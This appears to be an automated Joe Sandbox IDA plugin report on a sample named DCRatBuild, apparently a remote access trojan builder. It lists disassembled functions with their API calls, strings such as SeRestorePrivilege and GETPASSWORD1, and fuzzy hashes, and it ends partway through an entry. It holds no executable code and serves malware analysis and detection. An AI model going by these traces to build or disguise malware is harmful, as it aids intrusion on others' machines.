Instruction Fuzzy Hash: 6B414671900209AFCF15DF98CD81AAFBBF5FF48704F288199F905A7221D736AA50DB54

Function 00B17401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B17406

Part of subcall function 00B13BBA: __EH_prolog.LIBCMT ref: 00B13BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B174CD

Part of subcall function 00B17A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B17AAB
Part of subcall function 00B17A9C: GetLastError.KERNEL32 ref: 00B17AF1
Part of subcall function 00B17A9C: CloseHandle.KERNEL32(?), ref: 00B17B00

Strings

SeSecurityPrivilege, xrefs: 00B1744B
SeRestorePrivilege, xrefs: 00B17460

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 199eca684a3215b46c1ada33c182e763c373f494d63ce3a8b099682f46b1aff1
Instruction ID: 6dcf0d45af7398b21a231c66b653973e6cb62f57054ea97f434267e0dc38b6b2
Opcode Fuzzy Hash: 199eca684a3215b46c1ada33c182e763c373f494d63ce3a8b099682f46b1aff1
Instruction Fuzzy Hash: 9831DC71E44258AADF11EBA8DC45BEE7BF9EF18300F4440D5F808A7292CF748AC48B60

Function 00B2AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00B11316: GetDlgItem.USER32(00000000,00003021), ref: 00B1135A
Part of subcall function 00B11316: SetWindowTextW.USER32(00000000,00B435F4), ref: 00B11370

EndDialog.USER32(?,00000001), ref: 00B2AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B2ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B2ADC2

Strings

ASKNEXTVOL, xrefs: 00B2AD28

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 8545507f1b1c7ea80afc4166163c47d4ba86d0da2c7b789402d41b05b9dcc094
Instruction ID: effb63dffdc4ee141ec07c9efd1f0bc18e381e209240bd1f5f5c7bfa473549c0
Opcode Fuzzy Hash: 8545507f1b1c7ea80afc4166163c47d4ba86d0da2c7b789402d41b05b9dcc094
Instruction Fuzzy Hash: 0E11E031240120BFD7218F6CFD45F9677E9EF4A781F4005A4F248DB4A4CB6199859722

Function 00B1D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00B1D954
_strncpy.LIBCMT ref: 00B1D99A

Part of subcall function 00B21DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00B51030,00000200,00B1D928,00000000,?,00000050,00B51030), ref: 00B21DC4

Strings

$%s, xrefs: 00B1D949
@%s, xrefs: 00B1D93E

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 54ff0044a4c4ff1beb9e89478f04f6b161204ab3eb7c5ded2cc710f96d270291
Instruction ID: 457c50f68a1711e83daaa19731077568eed7ce45465faa42196b1ed0e0fa834f
Opcode Fuzzy Hash: 54ff0044a4c4ff1beb9e89478f04f6b161204ab3eb7c5ded2cc710f96d270291
Instruction Fuzzy Hash: E021AF32440248EEDB21EFA4CD45FEE7BE8EF05740F9444A2F910961A2E372DA88DB51

Function 00B20E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B1AC5A,00000008,?,00000000,?,00B1D22D,?,00000000), ref: 00B20E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B1AC5A,00000008,?,00000000,?,00B1D22D,?,00000000), ref: 00B20E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B1AC5A,00000008,?,00000000,?,00B1D22D,?,00000000), ref: 00B20E9F

Strings

Thread pool initialization failed., xrefs: 00B20EB7

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 91284fa312bb10c567cf814ab7c955bb935c31f66b25ea0f59847a33935ca7de
Instruction ID: 8ea778a5f7e494c73544189ce7a12d0f07328afd07766c3b12ccab3e7ca8c2f9
Opcode Fuzzy Hash: 91284fa312bb10c567cf814ab7c955bb935c31f66b25ea0f59847a33935ca7de
Instruction Fuzzy Hash: B51194B1A047189FC3216F66EC84AA7FBECFB59744F154C6EF1DAC3201DA715A808B50

Function 00B2B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00B11316: GetDlgItem.USER32(00000000,00003021), ref: 00B1135A
Part of subcall function 00B11316: SetWindowTextW.USER32(00000000,00B435F4), ref: 00B11370

EndDialog.USER32(?,00000001), ref: 00B2B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B2B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00B2B304

Strings

GETPASSWORD1, xrefs: 00B2B289

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 9522d81997e1b73324786306f9cc5c3152cd7cbc334da060cd43cfce180b189b
Instruction ID: c6925b58465be87cf6a7d285004d5bba66de45676d384d848044e75c504f7448
Opcode Fuzzy Hash: 9522d81997e1b73324786306f9cc5c3152cd7cbc334da060cd43cfce180b189b
Instruction Fuzzy Hash: E411C832940229B6DB219A64BC49FFF3BECEF59700F0004A4FA49B3184CBA59A459765

Function 00B2DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00B2DD1C, 00B2DD50
RENAMEDLG, xrefs: 00B2DD31

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: ea6f94eae9c0e8886af54a10480468861566bcc5beebbfb3024b2b7243d43b91
Instruction ID: 50f73dd45bbab51d65251c2ba75515105cf2b0868b1fc6ef076d45af6117b572
Opcode Fuzzy Hash: ea6f94eae9c0e8886af54a10480468861566bcc5beebbfb3024b2b7243d43b91
Instruction Fuzzy Hash: 7B015E7A604765AFD7118F59FC44B6A7FE8F708395B1404B5F80993371CE319850EBA0

Function 00B39A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B39AA9
__alldvrm.LIBCMT ref: 00B39CAA
__alldvrm.LIBCMT ref: 00B39CCC

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: d010d3b1480f1778147d971e43ef073fa0d7a1aa77f22519f655af40e65f1abe
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: 7FA15872A043869FEB25CF28C8917AEFBE5EF51310F7841EDE4959B281D2B89D41C750

Function 00B1A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00B17F69,?,?,?), ref: 00B1A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00B17F69,?), ref: 00B1A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00B17F69,?,?,?,?,?,?,?), ref: 00B1A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00B17F69,?,?,?,?,?,?,?,?,?,?), ref: 00B1A4C6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 033df83ee05f09e56f0a9c8af4d603756bc77ae09a5ac17af552cb9caacd6ce8
Instruction ID: 164618d66e0198bbc020e0d2d3ec5597b1b77fc19b5a9b95faa82321d90b7c70
Opcode Fuzzy Hash: 033df83ee05f09e56f0a9c8af4d603756bc77ae09a5ac17af552cb9caacd6ce8
Instruction Fuzzy Hash: 1A41D031249381AAD731DF24EC45FEEBBE4AB81700F44099DF5E4D3280D6A4AA88DB53

Function 00B11100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B1112B
_wcslen.LIBCMT ref: 00B11153
_wcslen.LIBCMT ref: 00B11182
_wcslen.LIBCMT ref: 00B111A9

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: d718a9fa79089dfcb422d30223ba277d82932d10a66886ec1797ea5984c8dcac
Instruction ID: 41248e64be20d4df5f44bb317dc74e2a3e9fcd5fe260311d78aa0d6094c0fe42
Opcode Fuzzy Hash: d718a9fa79089dfcb422d30223ba277d82932d10a66886ec1797ea5984c8dcac
Instruction Fuzzy Hash: 1741A3719006699BCB119F68CC45AEF7BF8EF01710F400459F949F7241DE30AE858BE4

Function 00B3C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00B391E0,?,00000000,?,00000001,?,?,00000001,00B391E0,?), ref: 00B3C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B3CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B36CBE,?), ref: 00B3CA70
__freea.LIBCMT ref: 00B3CA79

Part of subcall function 00B38E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B3CA2C,00000000,?,00B36CBE,?,00000008,?,00B391E0,?,?,?), ref: 00B38E38

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 1ab22adc13ab98e157e2e7820ee1210758e8526da01b068900160154a33e6d32
Instruction ID: 9502118bbc6b9ba30a6fdcfe7b254ac55244fa4732c7ebf0fca6c83d561a99fc
Opcode Fuzzy Hash: 1ab22adc13ab98e157e2e7820ee1210758e8526da01b068900160154a33e6d32
Instruction Fuzzy Hash: 1D319C72A0021AABDB25DFA4DC85DBE7BE5EB41710F2442A8FC04A7254EB35DE50DB90

Function 00B2A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B2A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B2A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B2A683
ReleaseDC.USER32(00000000,00000000), ref: 00B2A691

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f542b7739cfad1b7952b2f463fedb84801d704b4ee270782ca47f94492dedfcb
Instruction ID: 2a9b16b3cf4f8216eb36997e134cd7712722912d87d2351cd4770f6d1b1d2b4e
Opcode Fuzzy Hash: f542b7739cfad1b7952b2f463fedb84801d704b4ee270782ca47f94492dedfcb
Instruction Fuzzy Hash: 29E0EC31942722A7D6615B60BC0DF8A3E94AB06F53F010141FA09A7290DF6586809BA1

Function 00B2A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00B2A699: GetDC.USER32(00000000), ref: 00B2A69D
Part of subcall function 00B2A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B2A6A8
Part of subcall function 00B2A699: ReleaseDC.USER32(00000000,00000000), ref: 00B2A6B3

GetObjectW.GDI32(?,00000018,?), ref: 00B2A83C

Part of subcall function 00B2AAC9: GetDC.USER32(00000000), ref: 00B2AAD2
Part of subcall function 00B2AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00B2AB01
Part of subcall function 00B2AAC9: ReleaseDC.USER32(00000000,?), ref: 00B2AB99

Strings

(, xrefs: 00B2A9AA

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 4cdd08acc6a63b74134bc17d382d845af8e0a9edb1eacb5838cd3db449cfdb53
Instruction ID: b206fa2b230509837e52eb02e525bac899e65b8fb7c42b07927dc77acc1627e1
Opcode Fuzzy Hash: 4cdd08acc6a63b74134bc17d382d845af8e0a9edb1eacb5838cd3db449cfdb53
Instruction Fuzzy Hash: F991F075608350AFD610DF25D884A2BBBE8FFC9B00F04495EF59AD7260DB70AA45CF62

Function 00B175DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B175E3

Part of subcall function 00B205DA: _wcslen.LIBCMT ref: 00B205E0

Part of subcall function 00B1A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B1A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B1777F

Part of subcall function 00B1A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B1A325,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A501
Part of subcall function 00B1A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B1A325,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A532

Strings

:, xrefs: 00B17654

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: f1d8524406969fd7b9897d650132f856b897d0209af5bc025c4724ca93dc53f2
Instruction ID: 53e2f83d3eff64fc967295a500fd69663c0e2d5e61ea54d618d17c7e614c58c0
Opcode Fuzzy Hash: f1d8524406969fd7b9897d650132f856b897d0209af5bc025c4724ca93dc53f2
Instruction Fuzzy Hash: DB416071805258AAEB25EB64DC95EEEB3F9EF51300F8040D6B609A3092DB745FC9CB70

Function 00B2B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B2B4E3
_wcslen.LIBCMT ref: 00B2B4FE

Strings

}, xrefs: 00B2B4D6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 03e31f5d51eedea0823a991c1ca2f690b3f6f00a3b213222203a478e073d428a
Instruction ID: 5165c15cec80ee7d71668f6e47a65646dd9d08d2b87d71e38e8fb9ce6b06f845
Opcode Fuzzy Hash: 03e31f5d51eedea0823a991c1ca2f690b3f6f00a3b213222203a478e073d428a
Instruction Fuzzy Hash: D921057291432A5AD731EA64E855F6FB3DCDFA0760F1404AAF648C7241EF64DD4883B2

Function 00B1F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B1F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B1F2E4
Part of subcall function 00B1F2C5: GetProcAddress.KERNEL32(00B581C8,CryptUnprotectMemory), ref: 00B1F2F4

GetCurrentProcessId.KERNEL32(?,?,?,00B1F33E), ref: 00B1F3D2

Strings

CryptUnprotectMemory failed, xrefs: 00B1F3CA
CryptProtectMemory failed, xrefs: 00B1F389

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 2752faab272dbe547478f77eb9fdd97517ed3f81923d49fb5e03883f5400ce9a
Instruction ID: 575a824e10434152a9f1766aaed7580e1e4653baab9bb342a7eb5a789bcfd90d
Opcode Fuzzy Hash: 2752faab272dbe547478f77eb9fdd97517ed3f81923d49fb5e03883f5400ce9a
Instruction Fuzzy Hash: 651124316016266BDB115B20E8416BE37D4FF44B20B4441E5FC516B291DE709E81CB95

Function 00B1B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B1B9B8

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

Strings

%c:\, xrefs: 00B1B9AE

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
